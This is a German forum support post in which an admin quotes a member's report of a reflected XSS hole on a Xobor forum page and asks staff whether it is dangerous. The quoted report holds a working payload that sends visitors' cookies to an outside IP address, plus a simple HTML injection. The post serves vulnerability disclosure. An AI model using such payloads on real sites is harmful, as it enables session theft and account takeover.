Support Bereich Hier finden Sie Antworten auf alle Fragen zu Ihrem Xobor Forum.
Wählen Sie zunächst einen Hilfe-Bereich.

@Johannes
@Ingmar
@Sami

Ich habe eine beunruhigende Nachricht eines Mitglieds bekommen in dem er schrieb er könne das Forum hacken.

Zitat:
Hallo Scannerxy,


Ich habe ein sogenannten reflected XSS Attack gefunden. Damit kann ich valides Javascript auf deiner Webseite ausführen und sogesehen alles mögliche anstellen.
Damit ist es auch möglich die Anmeldedaten von Usern zu klauen durch Cookie stealing.

Ich seh, dass du eine recht große Community aufgebaut hast und wollte dir das schnellstmöglich mitteilen.

Hier sind paar Beispiele, damit du das mal selber sehen kannst (ich schreibe nur Text auf die Seite und einfaches javascript)

1) payedabo_forum.php?donate=1&paykey=AP-8EL15736YC445134N&amount=%3Ch1%3EHALLO%20SCANNERXY%20:)%20Das%20ist%20ein%20simpler%20html%20reflected%20XSS%20Attack%20%3C/h1%3E

2) Einfaches Javascript (funktioniert nur im firefox angemeldet, da chrome einen xss auditor hat; den kann man aber umgehen wenn man sich etwas mühe gibt)
payedabo_forum.php?donate=1&paykey=AP-8EL15736YC445134N&amount=%3Cscript%3Edocument.location%3D%22http:%2F%2F109.73.52.223%2F%3Fck%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E

Zitat Ende.

Was ist davon zu halten? Droht dadurch tatsächlich Gefahr? Es wäre nett wenn ihr dazu Stellung nehmen würdet.

Vielen Dank für das beheben der Sicherheitslücke.

Ich habe gerade weiteres per Kontaktformular an euch gesendet.